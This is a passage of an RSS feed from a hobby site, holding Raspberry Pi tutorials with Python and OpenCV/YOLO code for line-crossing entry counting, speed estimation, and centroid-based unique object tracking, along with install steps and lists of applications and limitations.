data-end="2471"&gt;&lt;/pre&gt;&lt;div class="contain-inline-size rounded-2xl corner-superellipse/1.1 relative bg-token-sidebar-surface-primary"&gt;&lt;/div&gt;&lt;pre class="overflow-visible! px-0!" data-start="1430" data-end="2471"&gt;&lt;/pre&gt;&lt;div class="@w-xl/main:top-9 sticky top-[calc(--spacing(9)+var(--header-height))]"&gt;&lt;div class="absolute end-0 bottom-0 flex h-9 items-center pe-2"&gt;&lt;div class="bg-token-bg-elevated-secondary text-token-text-secondary flex items-center gap-4 rounded-sm px-2 font-sans text-xs"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;pre class="overflow-visible! px-0!" data-start="1430" data-end="2471"&gt;&lt;/pre&gt;&lt;div class="contain-inline-size rounded-2xl corner-superellipse/1.1 relative bg-token-sidebar-surface-primary"&gt;&lt;div class="overflow-y-auto p-4" dir="ltr"&gt;&lt;code class="whitespace-pre! language-python"&gt;&lt;span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;import&lt;/span&gt;&lt;/span&gt;&lt;span&gt; cv2 &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;from&lt;/span&gt;&lt;/span&gt;&lt;span&gt; ultralytics &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;import&lt;/span&gt;&lt;/span&gt;&lt;span&gt; YOLO model = YOLO(&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-string"&gt;"yolov8n.pt"&lt;/span&gt;&lt;/span&gt;&lt;span&gt;) cap = cv2.VideoCapture(&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;span&gt;) line_y = &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;240&lt;/span&gt;&lt;/span&gt;&lt;span&gt; prev_y = &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-literal"&gt;None&lt;/span&gt;&lt;/span&gt;&lt;span&gt; entries = &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;span&gt; exits = &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;while&lt;/span&gt;&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-literal"&gt;True&lt;/span&gt;&lt;/span&gt;&lt;span&gt;: ret, frame = cap.read() &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;if&lt;/span&gt;&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;not&lt;/span&gt;&lt;/span&gt;&lt;span&gt; ret: &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;break&lt;/span&gt;&lt;/span&gt;&lt;span&gt; results = model(frame, verbose=&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-literal"&gt;False&lt;/span&gt;&lt;/span&gt;&lt;span&gt;) boxes = results[&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;span&gt;].boxes &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;if&lt;/span&gt;&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-built_in"&gt;len&lt;/span&gt;&lt;/span&gt;&lt;span&gt;(boxes) &amp;gt; &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;span&gt;: x1, y1, x2, y2 = boxes[&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;span&gt;].xyxy[&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;span&gt;] cy = &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-built_in"&gt;int&lt;/span&gt;&lt;/span&gt;&lt;span&gt;((y1 + y2) / &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;2&lt;/span&gt;&lt;/span&gt;&lt;span&gt;) &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;if&lt;/span&gt;&lt;/span&gt;&lt;span&gt; prev_y &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;is&lt;/span&gt;&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;not&lt;/span&gt;&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-literal"&gt;None&lt;/span&gt;&lt;/span&gt;&lt;span&gt;: &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;if&lt;/span&gt;&lt;/span&gt;&lt;span&gt; prev_y &amp;lt; line_y &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;and&lt;/span&gt;&lt;/span&gt;&lt;span&gt; cy &amp;gt;= line_y: entries += &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;1&lt;/span&gt;&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;elif&lt;/span&gt;&lt;/span&gt;&lt;span&gt; prev_y &amp;gt; line_y &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;and&lt;/span&gt;&lt;/span&gt;&lt;span&gt; cy &amp;lt;= line_y: exits += &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;1&lt;/span&gt;&lt;/span&gt;&lt;span&gt; prev_y = cy cv2.line(frame, (&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;span&gt;, line_y), (frame.shape[&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;1&lt;/span&gt;&lt;/span&gt;&lt;span&gt;], line_y), (&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;255&lt;/span&gt;&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;span&gt;), &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;2&lt;/span&gt;&lt;/span&gt;&lt;span&gt;) cv2.putText(frame, &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-string"&gt;f"Entries: &lt;span class="hljs-subst"&gt;{entries}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;", (&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;10&lt;/span&gt;&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;30&lt;/span&gt;&lt;/span&gt;&lt;span&gt;), cv2.FONT_HERSHEY_SIMPLEX, &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0.8&lt;/span&gt;&lt;/span&gt;&lt;span&gt;, (&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;span&gt;,&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;255&lt;/span&gt;&lt;/span&gt;&lt;span&gt;,&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;span&gt;), &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;2&lt;/span&gt;&lt;/span&gt;&lt;span&gt;) cv2.putText(frame, &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-string"&gt;f"Exits: &lt;span class="hljs-subst"&gt;{exits}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;", (&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;10&lt;/span&gt;&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;60&lt;/span&gt;&lt;/span&gt;&lt;span&gt;), cv2.FONT_HERSHEY_SIMPLEX, &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0.8&lt;/span&gt;&lt;/span&gt;&lt;span&gt;, (&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;span&gt;,&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0&lt;/span&gt;&lt;/span&gt;&lt;span&gt;,&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;255&lt;/span&gt;&lt;/span&gt;&lt;span&gt;), &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;2&lt;/span&gt;&lt;/span&gt;&lt;span&gt;) cv2.imshow(&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-string"&gt;"Line Counter"&lt;/span&gt;&lt;/span&gt;&lt;span&gt;, frame) &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;if&lt;/span&gt;&lt;/span&gt;&lt;span&gt; cv2.waitKey(&lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;1&lt;/span&gt;&lt;/span&gt;&lt;span&gt;) &amp;amp; &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;0xFF&lt;/span&gt;&lt;/span&gt;&lt;span&gt; == &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-number"&gt;27&lt;/span&gt;&lt;/span&gt;&lt;span&gt;: &lt;/span&gt;&lt;span&gt;&lt;span class="hljs-keyword"&gt;break&lt;/span&gt;&lt;/span&gt;&lt;span&gt; cap.release() cv2.destroyAllWindows() &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;hr data-start="2473" data-end="2476"&gt;&lt;p data-start="2478" data-end="2494"&gt;&lt;strong data-start="2478" data-end="2494"&gt;Applications&lt;/strong&gt;&lt;/p&gt;&lt;ul data-start="2496" data-end="2582"&gt;&lt;li data-start="2496" data-end="2526"&gt;&lt;p data-start="2498" data-end="2526"&gt;People entry/exit counting&lt;/p&gt;&lt;/li&gt;&lt;li data-start="2527" data-end="2553"&gt;&lt;p data-start="2529" data-end="2553"&gt;Store traffic analysis&lt;/p&gt;&lt;/li&gt;&lt;li data-start="2554" data-end="2582"&gt;&lt;p data-start="2556" data-end="2582"&gt;Simple access monitoring&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="2584" data-end="2587"&gt;&lt;p data-start="2589" data-end="2604"&gt;&lt;strong data-start="2589" data-end="2604"&gt;Limitations&lt;/strong&gt;&lt;/p&gt;&lt;ul data-start="2606" data-end="2672"&gt;&lt;li data-start="2606" data-end="2641"&gt;&lt;p data-start="2608" data-end="2641"&gt;Works best with one main object&lt;/p&gt;&lt;/li&gt;&lt;li data-start="2642" data-end="2672"&gt;&lt;p data-start="2644" data-end="2672"&gt;Occlusions reduce accuracy&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="2674" data-end="2677"&gt;&lt;p data-start="2679" data-end="2693"&gt;&lt;strong data-start="2679" data-end="2693"&gt;Conclusion&lt;/strong&gt;&lt;/p&gt;&lt;p data-start="2695" data-end="2863"&gt;Raspberry Pi can perform practical AI analytics like entry and exit counting without expensive hardware.&lt;br data-start="2799" data-end="2802"&gt;This is a real, deployable AI use case on affordable devices.&lt;/p&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/108/line-crossing-counter-with-raspberry-entry-exit-detection</guid>
<pubDate>Sun, 21 Dec 2025 21:03:34 +0000</pubDate>
</item>
<item>
<title>Speed estimation with AI on Raspberry Pi</title>
<link>https://asky.uk/107/speed-estimation-with-ai-on-raspberry-pi</link>
<description>&lt;p data-start="374" data-end="473"&gt;Hardware: Raspberry Pi 4 / Raspberry Pi 5&lt;br data-start="415" data-end="418"&gt;AI type: Computer Vision – Detection + Speed Estimation&lt;/p&gt;&lt;hr data-start="475" data-end="478"&gt;&lt;p data-start="480" data-end="488"&gt;Overview&lt;/p&gt;&lt;p data-start="490" data-end="705"&gt;This project shows how a Raspberry Pi can estimate the speed of moving objects using AI-based object detection and simple motion analysis.&lt;br data-start="628" data-end="631"&gt;The system runs fully offline and does not require GPUs or cloud services.&lt;/p&gt;&lt;p data-start="707" data-end="814"&gt;The goal is not absolute precision, but a practical and reproducible AI approach using affordable hardware.&lt;/p&gt;&lt;hr data-start="816" data-end="819"&gt;&lt;p data-start="821" data-end="840"&gt;What you will build&lt;/p&gt;&lt;ul data-start="842" data-end="1015"&gt;&lt;li data-start="842" data-end="887"&gt;&lt;p data-start="844" data-end="887"&gt;AI-based object detection on Raspberry Pi&lt;/p&gt;&lt;/li&gt;&lt;li data-start="888" data-end="930"&gt;&lt;p data-start="890" data-end="930"&gt;Tracking object movement across frames&lt;/p&gt;&lt;/li&gt;&lt;li data-start="931" data-end="988"&gt;&lt;p data-start="933" data-end="988"&gt;Estimating object speed using pixel distance and time&lt;/p&gt;&lt;/li&gt;&lt;li data-start="989" data-end="1015"&gt;&lt;p data-start="991" data-end="1015"&gt;Fully local processing&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="1017" data-end="1020"&gt;&lt;p data-start="1022" data-end="1039"&gt;Required hardware&lt;/p&gt;&lt;ul data-start="1041" data-end="1149"&gt;&lt;li data-start="1041" data-end="1077"&gt;&lt;p data-start="1043" data-end="1077"&gt;Raspberry Pi 4 or Raspberry Pi 5&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1078" data-end="1115"&gt;&lt;p data-start="1080" data-end="1115"&gt;Raspberry Pi Camera or USB camera&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1116" data-end="1132"&gt;&lt;p data-start="1118" data-end="1132"&gt;microSD card&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1133" data-end="1149"&gt;&lt;p data-start="1135" data-end="1149"&gt;Power supply&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="1151" data-end="1154"&gt;&lt;p data-start="1156" data-end="1177"&gt;Software requirements&lt;/p&gt;&lt;ul data-start="1179" data-end="1263"&gt;&lt;li data-start="1179" data-end="1198"&gt;&lt;p data-start="1181" data-end="1198"&gt;Raspberry Pi OS&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1199" data-end="1211"&gt;&lt;p data-start="1201" data-end="1211"&gt;Python 3&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1212" data-end="1222"&gt;&lt;p data-start="1214" data-end="1222"&gt;OpenCV&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1223" data-end="1263"&gt;&lt;p data-start="1225" data-end="1263"&gt;Ultralytics YOLO (lightweight model)&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="1265" data-end="1268"&gt;&lt;p data-start="1270" data-end="1290"&gt;Project architecture&lt;/p&gt;&lt;ol data-start="1292" data-end="1438"&gt;&lt;li data-start="1292" data-end="1325"&gt;&lt;p data-start="1295" data-end="1325"&gt;Camera captures video frames&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1326" data-end="1355"&gt;&lt;p data-start="1329" data-end="1355"&gt;AI model detects objects&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1356" data-end="1389"&gt;&lt;p data-start="1359" data-end="1389"&gt;Object positions are tracked&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1390" data-end="1438"&gt;&lt;p data-start="1393" data-end="1438"&gt;Speed is calculated from movement over time&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;hr data-start="1440" data-end="1443"&gt;&lt;p data-start="1445" data-end="1463"&gt;Installation steps&lt;/p&gt;&lt;p data-start="1465" data-end="1504"&gt;Update system and install dependencies:&lt;/p&gt;&lt;p data-start="1465" data-end="1504"&gt;sudo apt update&lt;br&gt;sudo apt upgrade&lt;br&gt;sudo apt install python3-opencv python3-pip&lt;br&gt;pip3 install ultralytics&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;p data-start="1626" data-end="1641"&gt;AI model choice&lt;/p&gt;&lt;p data-start="1643" data-end="1751"&gt;A lightweight YOLO Nano model is used for detection.&lt;br data-start="1695" data-end="1698"&gt;The model is pre-trained and used only for inference.&lt;/p&gt;&lt;p data-start="1643" data-end="1751"&gt;import cv2&lt;br&gt;from ultralytics import YOLO&lt;br&gt;import time&lt;br&gt;import math&lt;br&gt;&lt;br&gt;model = YOLO("yolov8n.pt")&lt;br&gt;cap = cv2.VideoCapture(0)&lt;br&gt;&lt;br&gt;prev_pos = None&lt;br&gt;prev_time = None&lt;br&gt;speed = 0&lt;br&gt;&lt;br&gt;PIXELS_PER_METER = 50&amp;nbsp; # calibration value&lt;br&gt;&lt;br&gt;while True:&lt;br&gt;&amp;nbsp; &amp;nbsp; ret, frame = cap.read()&lt;br&gt;&amp;nbsp; &amp;nbsp; if not ret:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; results = model(frame, verbose=False)&lt;br&gt;&amp;nbsp; &amp;nbsp; boxes = results[0].boxes&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; if len(boxes) &amp;gt; 0:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x1, y1, x2, y2 = boxes[0].xyxy[0]&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; cx = int((x1 + x2) / 2)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; cy = int((y1 + y2) / 2)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; current_time = time.time()&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; if prev_pos is not None:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; dist_pixels = math.hypot(cx - prev_pos[0], cy - prev_pos[1])&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; dist_meters = dist_pixels / PIXELS_PER_METER&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; dt = current_time - prev_time&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; if dt &amp;gt; 0:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; speed = dist_meters / dt&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; prev_pos = (cx, cy)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; prev_time = current_time&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; cv2.circle(frame, (cx, cy), 5, (0, 255, 0), -1)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; cv2.putText(frame, f"Speed: {speed:.2f} m/s",&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; (10, 30), cv2.FONT_HERSHEY_SIMPLEX,&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 1, (0, 255, 0), 2)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; cv2.imshow("AI Speed Estimation", frame)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; if cv2.waitKey(1) &amp;amp; 0xFF == 27:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break&lt;br&gt;&lt;br&gt;cap.release()&lt;br&gt;cv2.destroyAllWindows()&lt;/p&gt;&lt;p data-start="2982" data-end="2994"&gt;How it works&lt;/p&gt;&lt;p data-start="2996" data-end="3232"&gt;The AI model detects an object and extracts its center position.&lt;br data-start="3060" data-end="3063"&gt;The distance between positions across frames is measured in pixels and converted to meters using a calibration factor.&lt;br data-start="3181" data-end="3184"&gt;Speed is calculated as distance divided by time.&lt;/p&gt;&lt;hr data-start="3234" data-end="3237"&gt;&lt;p data-start="3239" data-end="3255"&gt;Calibration note&lt;/p&gt;&lt;p data-start="3257" data-end="3385"&gt;The PIXELS_PER_METER value depends on camera position and scene scale.&lt;br data-start="3327" data-end="3330"&gt;It must be adjusted experimentally for better accuracy.&lt;/p&gt;&lt;hr data-start="3387" data-end="3390"&gt;&lt;p data-start="3392" data-end="3414"&gt;Practical applications&lt;/p&gt;&lt;ul data-start="3416" data-end="3527"&gt;&lt;li data-start="3416" data-end="3444"&gt;&lt;p data-start="3418" data-end="3444"&gt;Traffic speed monitoring&lt;/p&gt;&lt;/li&gt;&lt;li data-start="3445" data-end="3470"&gt;&lt;p data-start="3447" data-end="3470"&gt;Robot motion analysis&lt;/p&gt;&lt;/li&gt;&lt;li data-start="3471" data-end="3499"&gt;&lt;p data-start="3473" data-end="3499"&gt;Conveyor belt monitoring&lt;/p&gt;&lt;/li&gt;&lt;li data-start="3500" data-end="3527"&gt;&lt;p data-start="3502" data-end="3527"&gt;Educational AI projects&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="3529" data-end="3532"&gt;&lt;p data-start="3534" data-end="3545"&gt;Limitations&lt;/p&gt;&lt;ul data-start="3547" data-end="3674"&gt;&lt;li data-start="3547" data-end="3579"&gt;&lt;p data-start="3549" data-end="3579"&gt;Approximate speed estimation&lt;/p&gt;&lt;/li&gt;&lt;li data-start="3580" data-end="3625"&gt;&lt;p data-start="3582" data-end="3625"&gt;Sensitive to camera angle and calibration&lt;/p&gt;&lt;/li&gt;&lt;li data-start="3626" data-end="3674"&gt;&lt;p data-start="3628" data-end="3674"&gt;Not suitable for high-precision measurements&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="3676" data-end="3679"&gt;&lt;p data-start="3681" data-end="3691"&gt;Conclusion&lt;/p&gt;&lt;p data-start="3693" data-end="3916"&gt;This project demonstrates that Raspberry Pi can perform meaningful AI-based speed estimation without GPUs or cloud services.&lt;br data-start="3817" data-end="3820"&gt;With lightweight models and simple math, affordable hardware can deliver practical AI solutions.&lt;/p&gt;&lt;p data-start="3918" data-end="3969"&gt;AI without millions remains an engineering reality.&lt;/p&gt;&lt;p data-start="1643" data-end="1751"&gt;&lt;img alt="" src="https://i.ytimg.com/vi/n2WT3Qb0SIU/maxresdefault.jpg" style="height:506px; width:900px"&gt;&lt;/p&gt;&lt;p data-start="1465" data-end="1504"&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/107/speed-estimation-with-ai-on-raspberry-pi</guid>
<pubDate>Fri, 19 Dec 2025 07:22:17 +0000</pubDate>
</item>
<item>
<title>Object Tracking and Unique Counting with AI on Raspberry Pi</title>
<link>https://asky.uk/106/object-tracking-and-unique-counting-with-ai-on-raspberry-pi</link>
<description>&lt;p&gt;Hardware: Raspberry Pi 4 / Raspberry Pi 5&lt;br&gt;AI type: Computer Vision – Object Detection + Tracking&lt;/p&gt;&lt;p&gt;Overview&lt;/p&gt;&lt;p&gt;Simple object counting detects how many objects appear in a frame, but it cannot distinguish between new and already seen objects.&lt;br&gt;This project extends basic AI detection by adding object tracking, allowing the Raspberry Pi to count each object only once.&lt;/p&gt;&lt;p&gt;The result is a more practical AI system suitable for real-world scenarios such as people flow monitoring or vehicle counting.&lt;/p&gt;&lt;p&gt;What you will build&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;AI-based object detection on Raspberry Pi&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Object tracking across video frames&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Unique object counting (count once per object)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Fully local and offline system&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Required hardware&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi 4 or Raspberry Pi 5&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi Camera or USB camera&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;microSD card&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Power supply&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Software requirements&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi OS&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Python 3&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;OpenCV&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Ultralytics YOLO (lightweight model)&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Project architecture&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Camera captures video frames&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;AI model detects objects in each frame&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Tracker assigns IDs to detected objects&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Each object ID is counted only once&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;This avoids double counting and improves accuracy.&lt;/p&gt;&lt;p&gt;Installation steps&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Update system&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;sudo apt update sudo apt upgrade&lt;/p&gt;&lt;ol start="2"&gt;&lt;li&gt;&lt;p&gt;Install dependencies&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;sudo apt install python3-opencv python3-pip pip3 install ultralytics&lt;/p&gt;&lt;ol start="3"&gt;&lt;li&gt;&lt;p&gt;Reboot the system&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;AI model and tracking method&lt;/p&gt;&lt;p&gt;This project uses a lightweight YOLO model for detection and a simple centroid-based tracking logic.&lt;br&gt;Each detected object is assigned an ID based on its position across frames.&lt;/p&gt;&lt;p&gt;This approach is computationally efficient and suitable for Raspberry Pi hardware.&lt;/p&gt;&lt;hr&gt;&lt;p&gt;Python code (copy-paste)&lt;/p&gt;&lt;p&gt;import cv2 from ultralytics import YOLO import math model = YOLO("yolov8n.pt") cap = cv2.VideoCapture(0) object_id = 0 objects = {} counted_ids = set() def distance(p1, p2): return math.hypot(p1[0] - p2[0], p1[1] - p2[1]) while True: ret, frame = cap.read() if not ret: break results = model(frame, verbose=False) boxes = results[0].boxes current_centroids = [] for box in boxes: x1, y1, x2, y2 = box.xyxy[0] cx = int((x1 + x2) / 2) cy = int((y1 + y2) / 2) current_centroids.append((cx, cy)) for centroid in current_centroids: matched = False for oid, prev in objects.items(): if distance(centroid, prev) &amp;lt; 50: objects[oid] = centroid matched = True break if not matched: objects[object_id] = centroid counted_ids.add(object_id) object_id += 1 for oid, (cx, cy) in objects.items(): cv2.circle(frame, (cx, cy), 5, (0, 255, 0), -1) cv2.putText(frame, f"ID {oid}", (cx + 5, cy + 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 1) cv2.putText(frame, f"Unique count: {len(counted_ids)}", (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2) cv2.imshow("AI Object Tracking", frame) if cv2.waitKey(1) &amp;amp; 0xFF == 27: break cap.release() cv2.destroyAllWindows()&lt;/p&gt;&lt;hr&gt;&lt;p&gt;How it works&lt;/p&gt;&lt;p&gt;Each detected object is represented by its centroid.&lt;br&gt;The system compares centroids between frames and assigns the same ID if the distance is below a threshold.&lt;/p&gt;&lt;p&gt;When a new object appears, it receives a new ID and is counted only once.&lt;/p&gt;&lt;p&gt;This simple tracking logic avoids the complexity of advanced trackers while remaining effective.&lt;/p&gt;&lt;p&gt;Performance notes&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Works best with moderate object movement&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;High-speed motion may cause ID switching&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Lower camera resolution improves stabilit&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Practical application&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;People flow analysis&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Vehicle counting&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Queue monitoring&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Entrance and exit statistics&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Smart surveillance 